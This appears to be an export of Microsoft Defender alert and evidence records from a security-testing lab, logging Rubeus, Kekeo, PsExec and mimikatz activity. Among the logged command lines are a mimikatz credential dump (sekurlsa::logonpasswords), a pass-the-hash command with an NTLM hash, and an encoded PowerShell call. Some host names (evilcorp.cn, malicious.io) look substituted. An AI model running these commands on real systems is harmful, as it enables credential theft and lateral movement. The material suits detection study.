"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "PendingApproval",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Malicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-12-22T08:51:30.1466667Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.1.5",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "MSDXV8",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:51:30.1466667Z",
"fileName": "explorer.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:26:23.9030784Z",
"parentProcessFileName": "userinit.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 2796,
"processCommandLine": "Explorer.EXE",
"processCreationTime": "2022-12-22T08:26:24.0772409Z",
"processId": 1896,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "56d2d9f6c4b44cfedcf71a86ed68cd859e5c692d",
"sha256": "8c75757111b8bc8bd0730fabe3c99f73f08169dfd54ed6a64dcf983dc53fec4b",
"url": null,
"userPrincipalName": "jeff@msdxv8.m365dpoc.com",
"userSid": "S-1-5-21-2159906967-4174806019-1002223092-1104",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-12-22T08:51:30.1466667Z",
"fileName": "lsass.exe",
"filePath": "C:\\Windows\\System32",
"ipAddress": null,
"parentProcessCreationTime": "2022-12-22T08:22:31.0581711Z",
"parentProcessFileName": "wininit.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 568,
"processCommandLine": "lsass.exe",
"processCreationTime": "2022-12-22T08:22:31.2215121Z",
"processId": 720,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "0fb26350106c9bdd196d4e7d01eb30007663687c",
"sha256": "bbc83e4759d4b82bad31e371ad679aa414c72273bf97cee5aed8337ed8a4d79f",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "7ba8aa008687dd62d639cb45b52c7c9f971c65c1",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-12-22T08:59:22.5666667Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638045930704256313_1763457179
|
5ab5c14a-dab2-4df3-813c-d63f2d243b21
| 765
|
MicrosoftDefenderForEndpoint
|
2022-11-21T02:04:30.4256515Z
|
2022-11-21T02:36:16.63Z
| null |
2022-11-21T02:02:27.8997725Z
|
2022-11-21T02:33:42.858757Z
|
Possible use of the Rubeus kerberoasting tool
|
Activity indicating the use of the Rubeus tool was observed on this endpoint. This tool can perform kerberoasting, pass-the-ticket, and other attack techniques that take advantage of Kerberos authentication.
During these attacks, attackers often request Kerberos tickets for an account's service principal name (SPN). They then decrypt the tickets to get plaintext credentials associated with the account. Alternatively, they can perform the pass-the-ticket technique to authenticate directly without having to decrypt the obtained tickets.
|
SuspiciousActivity
|
New
|
Medium
| null |
UnsupportedAlertType
| null | null |
WindowsDefenderAtp
|
6606ef29-d293-4f24-a7c5-334dcb40b412
| null | null | null |
[
"T1558.003"
] |
[
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "msdxv2-win10b.msdxv2.m365dpoc.com",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "Low",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] |
[
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:04:30.4666667Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": "0808dea1-2ec8-41d2-8e3e-7c18309fab09",
"accountName": "steve",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-21T02:21:59.8333333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "steve@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1107",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043451253345303_-1125840922
|
d4b18d26-edcc-437b-be48-7d723a86788f
| 741
|
MicrosoftDefenderForEndpoint
|
2022-11-18T05:12:05.3345541Z
|
2022-11-19T01:35:46.6533333Z
|
2022-11-19T01:35:46.5533333Z
|
2022-11-18T05:09:53.1912748Z
|
2022-11-18T05:14:15.9874335Z
|
Suspicious remote activity
|
Suspicious activity initiated remotely was observed on this machine. This alert can flag attempts to initiate interactive sessions, modify files, pass WMI commands, create scheduled tasks, and other potentially malicious activities from a remote machine.
|
LateralMovement
|
Resolved
|
Medium
| 49
|
PendingApproval
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
64e1767d-3cc3-4573-8707-d2892b79c155
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1021",
"T1105",
"T1543.003",
"T1569.002"
] |
[
{
"aadDeviceId": "14b11ffe-5128-4842-bbdf-31f0fbfcb600",
"defenderAvStatus": "Updated",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:29:47.252Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "steve",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"onboardingStatus": "Onboarded",
"osBuild": 19043,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Semi Auto Client",
"riskScore": "High",
"tags": [
"semi auto"
],
"version": "21H1",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10B",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "2f7d6bc4-df6d-4836-becd-aff9cb361b66"
}
}
] |
[
{
"aadUserId": "89b6fc86-af84-47b2-a72d-325362598b2c",
"accountName": "ronhd",
"detectionStatus": null,
"deviceId": null,
"domainName": "MSDXV2",
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:12:05.38Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "ronhd@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1111",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "User",
"evidenceCreationTime": "2022-11-18T05:12:05.38Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": "S-1-0-0",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:12:05.38Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "NotFound",
"remediationStatusDetails": "The system cannot find the file specified.",
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": null,
"detectionStatus": null,
"deviceId": null,
"domainName": null,
"entityType": "Ip",
"evidenceCreationTime": "2022-11-18T05:12:05.38Z",
"fileName": null,
"filePath": null,
"ipAddress": "10.0.0.9",
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:12:05.38Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-18T05:10:14.6889142Z",
"processId": 8284,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
},
{
"aadUserId": null,
"accountName": "SYSTEM",
"detectionStatus": "Detected",
"deviceId": "36150b3c1b69b5c2da9df4efd86ac6c166924a48",
"domainName": "NT AUTHORITY",
"entityType": "Process",
"evidenceCreationTime": "2022-11-18T05:16:47.02Z",
"fileName": "PSEXESVC.exe",
"filePath": "C:\\Windows",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-16T03:32:19.0279725Z",
"parentProcessFileName": "services.exe",
"parentProcessFilePath": "C:\\Windows\\System32",
"parentProcessId": 620,
"processCommandLine": "PSEXESVC.exe",
"processCreationTime": "2022-11-18T05:14:15.4780441Z",
"processId": 8968,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": "f309b61a8b005b5ce0a3fb58caaa798cfc95f5db",
"sha256": "3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748",
"url": null,
"userPrincipalName": null,
"userSid": "S-1-5-18",
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
da638043456311109553_1236121366
|
2f99dcdc-e33f-4c44-9ed3-69674f977e22
| 741
|
MicrosoftDefenderForEndpoint
|
2022-11-18T05:20:31.1109759Z
|
2022-11-19T01:35:46.6533333Z
|
2022-11-19T01:35:46.5533333Z
|
2022-11-18T05:09:33.3641923Z
|
2022-11-18T05:09:33.3641923Z
|
'Kekeo' malware was detected
|
Malware and unwanted software are undesirable applications that perform annoying, disruptive, or harmful actions on affected machines. Some of these undesirable applications can replicate and spread from one machine to another. Others are able to receive commands from remote attackers and perform activities associated with cyber attacks.
This detection might indicate that the malware was stopped from delivering its payload. However, it is prudent to check the machine for signs of infection.
|
Malware
|
Resolved
|
Informational
| 47
|
PartiallyInvestigated
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAv
|
d60f5b90-ecd8-4d77-8186-a801597ec762
|
takeshi@msdxv2.m365dpoc.com
| null |
Kekeo
|
[] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "evilcorp.cn",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": null,
"accountName": null,
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": null,
"entityType": "File",
"evidenceCreationTime": "2022-11-18T05:20:31.1366667Z",
"fileName": "Rubeus.exe",
"filePath": "C:\\M365DAttack\\Rubeus",
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "fc870d086c53ded2e94300f7569aa9478186f2c7",
"sha256": "a1fddd460edd35ed449d32cc43bc15675c48a314a6fa5fb158e3bc4fea460be1",
"url": null,
"userPrincipalName": null,
"userSid": null,
"verdict": "Suspicious"
}
] | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-18T05:10:42.37Z
|
Suspicious
|
None
|
MSDXV2-Win10V$
|
malicious.io
|
S-1-5-18
| null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-16T08:31:10.5066667Z
|
Suspicious
|
None
|
bob
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1109
|
34a6a005-fc93-42dc-ae87-352d3e9921c4
|
jesse@msdxv2.m365dpoc.com
|
34f6168251ce3ed625e9b8d26b0ce5dad7421dbe
|
20a100ad633bd79474edcc3736eefc395d39f7d5904c46ddb96593316ce6b262
|
SystemSettingsAdminFlows.exe
|
C:\Windows\System32
| 540
|
"SystemSettingsAdminFlows.exe" Defender SubmitSamplesConsent 0
|
2022-11-16T08:30:20.1839033Z
| 4,704
|
2022-11-16T07:26:02.7983467Z
|
SystemSettings.exe
|
C:\Windows\ImmersiveControlPanel
|
Detected
|
7114973b832b32d349815a5d2811738cc10fa650
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-22T09:30:37.3433333Z
|
Suspicious
|
None
|
jeff
|
evilcorp.cn
|
S-1-5-21-2159906967-4174806019-1002223092-1104
| null |
jeff@msdxv8.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-18T05:10:38.4Z
|
Suspicious
|
None
|
analyst
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-13T21:16:42.6266667Z
|
Suspicious
|
None
|
darol
|
evilcorp.cn
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-11-19T02:34:25.7533333Z
|
Suspicious
|
None
|
analyst
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-11T08:24:15.04Z
|
Suspicious
|
None
|
jeff
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 6,044
|
ipconfig
|
2022-11-11T08:17:06.3382251Z
| 4,704
|
2022-11-11T08:16:44.2952776Z
|
powershell.exe
|
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-09-30T06:14:46.0833333Z
|
Suspicious
|
None
|
bob
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-12-22T09:30:44.15Z
|
Suspicious
|
None
|
jeff
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-1104
| null |
jeff@msdxv8.m365dpoc.com
|
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 4,284
|
whoami /all
|
2022-12-22T09:28:43.3962562Z
| 5,408
|
2022-12-22T09:07:41.4690585Z
|
powershell_ise.exe
|
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-12-22T08:57:32.0833333Z
|
Suspicious
|
None
|
SYSTEM
|
NT AUTHORITY
|
S-1-5-18
| null | null |
f309b61a8b005b5ce0a3fb58caaa798cfc95f5db
|
3c19fee379b4882971834a3d38f3f8b86de560114274375560433778cd505748
|
PSEXESVC.exe
|
C:\Windows
| 4,216
|
powershell -enc ZABpAHIA
|
2022-12-22T08:47:50.8661147Z
| 748
|
2022-12-22T08:38:52.5569028Z
|
services.exe
|
C:\Windows\System32
|
Detected
|
4f111b3b2366eacdcc66d7ad73548fff9b039c15
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
User
|
2022-12-14T17:26:21.57Z
|
Suspicious
|
None
|
admin
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1110
|
598763ac-48bb-4671-9472-6be219756e33
|
darol@msdxv2.m365dpoc.com
| null | null | null | null | null | null | null | null | null | null | null | null | null |
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-09-30T06:13:02.38Z
|
Suspicious
|
None
|
root
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
70df765f554ed7392200422c18776b8992c09231
|
912018ab3c6b16b39ee84f17745ff0c80a33cee241013ec35d0281e40c0658d9
|
mimikatz.exe
|
C:\M365DAttack\Mimikatz\x64
| 2,596
|
"mimikatz.exe" privilege::debug sekurlsa::logonpasswords exit
|
2022-09-30T06:11:52.7127433Z
| 4,064
|
2022-09-30T06:11:13.210308Z
|
powershell.exe
|
\Device\HarddiskVolume4\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-11-11T08:21:09.1466667Z
|
Suspicious
|
Active
|
jeff
|
msdxv2.m365dpoc
|
S-1-5-21-2300221942-1987151257-321556088-1104
|
e848b07a-87af-4448-9979-09f0b809c8d4
|
jeff@msdxv2.m365dpoc.com
|
9a3be34e8316ebb945a4d5818a4066c91fe98c95
|
54daf167f8dbe7fe0f23b37a600bd8d9d16b756d3b83f0804b5037cbbe895eb6
|
nslookup.exe
|
C:\Windows\System32
| 4,560
|
nslookup msdxv2-dc.msdxv2.m365dpoc.com
|
2022-11-11T08:17:05.938877Z
| 6,316
|
2022-11-11T08:17:05.9216438Z
|
cmd.exe
|
C:\Windows\System32
|
Detected
|
c7e147cb0eb3534a4dcea5acb8e61c933713b145
|
null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null | null |
Process
|
2022-12-22T08:50:47.2866667Z
|
Benign
|
None
|
jeff
|
MSDXV8
|
S-1-5-21-2159906967-4174806019-1002223092-1104
| null |
jeff@msdxv8.m365dpoc.com
|
4f4970c3545972fea2bc1984d597fc810e6321e0
|
25c8266d2bc1d5626dcdf72419838b397d28d44d00ac09f02ff4e421b43ec369
|
net.exe
|
C:\Windows\System32
| 2,936
|
"net.exe" group /domain
|
2022-12-22T08:47:23.1029019Z
| 6,324
|
2022-12-22T08:47:11.8139068Z
|
powershell.exe
|
C:\Windows\System32\WindowsPowerShell\v1.0
|
Detected
|
7ba8aa008687dd62d639cb45b52c7c9f971c65c1
|
da638037516787046565_654857968
|
200c882a-731d-4992-8bb8-5e7a8278da62
| 686
|
MicrosoftDefenderForEndpoint
|
2022-11-11T08:21:18.7046772Z
|
2022-11-12T01:35:43.1766667Z
|
2022-11-12T01:35:42.84Z
|
2022-11-11T08:18:30.1154683Z
|
2022-11-11T08:18:30.1154683Z
|
LSASS process memory modified
|
The Local Security Authority Subsystem Service (LSASS) process enforces security policy by verifying user logons and password changes. Attackers might modify LSASS memory to bypass security mechanisms or circumvent legitimate checks.
|
CredentialAccess
|
Resolved
|
High
| null |
UnsupportedAlertType
|
TruePositive
|
SecurityTesting
|
WindowsDefenderAtp
|
eb025de4-0ad4-4fcb-8ce2-711ee3956107
|
takeshi@msdxv2.m365dpoc.com
| null | null |
[
"T1003",
"T1003.001",
"T1547.005"
] |
[
{
"aadDeviceId": null,
"defenderAvStatus": "Updated",
"deviceDnsName": "staging.net",
"firstSeen": "2022-08-08T08:51:02.455Z",
"healthStatus": "Active",
"loggedOnUsers": [
{
"accountName": "jeff",
"domainName": "MSDXV2"
}
],
"mdatpDeviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"onboardingStatus": "Onboarded",
"osBuild": 17763,
"osPlatform": "Windows10",
"osProcessor": "x64",
"rbacGroupName": "Full Auto Clients",
"riskScore": "High",
"tags": [
"Full auto"
],
"version": "1809",
"vmMetadata": {
"cloudProvider": "Unknown",
"resourceId": "/subscriptions/29e73d07-8740-4164-a257-592a19a7b77c/resourceGroups/MSDXV2/providers/Microsoft.Compute/virtualMachines/MSDXV2-Win10V",
"subscriptionId": "29e73d07-8740-4164-a257-592a19a7b77c",
"vmId": "17881b39-b03f-4a2c-9b56-078be1330bd0"
}
}
] |
[
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": null,
"deviceId": null,
"domainName": "msdxv2.m365dpoc",
"entityType": "User",
"evidenceCreationTime": "2022-11-11T08:21:18.7533333Z",
"fileName": null,
"filePath": null,
"ipAddress": null,
"parentProcessCreationTime": null,
"parentProcessFileName": null,
"parentProcessFilePath": null,
"parentProcessId": null,
"processCommandLine": null,
"processCreationTime": null,
"processId": null,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "None",
"remediationStatusDetails": null,
"sha1": null,
"sha256": null,
"url": null,
"userPrincipalName": "jeff@msdxv2.m365dpoc.com",
"userSid": "S-1-5-21-2300221942-1987151257-321556088-1104",
"verdict": "Suspicious"
},
{
"aadUserId": "e848b07a-87af-4448-9979-09f0b809c8d4",
"accountName": "jeff",
"detectionStatus": "Detected",
"deviceId": "c7e147cb0eb3534a4dcea5acb8e61c933713b145",
"domainName": "msdxv2.m365dpoc",
"entityType": "Process",
"evidenceCreationTime": "2022-11-11T08:21:18.7533333Z",
"fileName": "mimikatz.exe",
"filePath": "C:\\M365DAttack\\Mimikatz\\x64",
"ipAddress": null,
"parentProcessCreationTime": "2022-11-11T08:16:44.2952776Z",
"parentProcessFileName": "powershell.exe",
"parentProcessFilePath": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
"parentProcessId": 4704,
"processCommandLine": "\"mimikatz.exe\" privilege::debug \"sekurlsa::pth /user:ronhd /ntlm:96def1a633fc6790124d5f8fe21cc72b /domain:msdxv2.m365dpoc.com /run:\\\"powershell.exe dir \\\\msdxv2-win10b\\C$ >> C:\\M365DAttack\\Step3-PasstheHash.txt\\\"\" exit",
"processCreationTime": "2022-11-11T08:17:06.6760783Z",
"processId": 816,
"registryHive": null,
"registryKey": null,
"registryValue": null,
"registryValueType": null,
"remediationStatus": "Active",
"remediationStatusDetails": null,
"sha1": "70df765f554ed7392200422c18776b8992c09231",
